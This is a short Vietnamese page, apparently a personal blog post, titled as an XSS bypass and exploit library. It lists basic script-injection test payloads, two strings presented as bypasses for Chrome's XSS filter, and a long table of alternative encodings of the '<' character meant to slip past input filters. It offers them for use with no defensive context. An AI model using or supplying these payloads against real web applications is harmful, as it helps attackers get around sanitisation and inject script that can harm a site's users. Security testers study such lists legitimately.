Thư viện XSS (By Pass + Exploit)

xss

Một số dòng script test cơ bản.

<script>alert("XSS");</script>
<script>alert(String.fromCharCode(88, 83, 83))</script>
"><script>alert("XSS");</script>

By Pass Chrome

<script>void("&b=")%3Balert(123)%3B<%2Fscript>
<script>void('&b=');alert('XSS');</script>

 

 

By Pass cái dấu “<“

%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

Còn tiếp…..

Updated: 09/11/2016 — 6:01 chiều
Tăng Dương Triều © 2017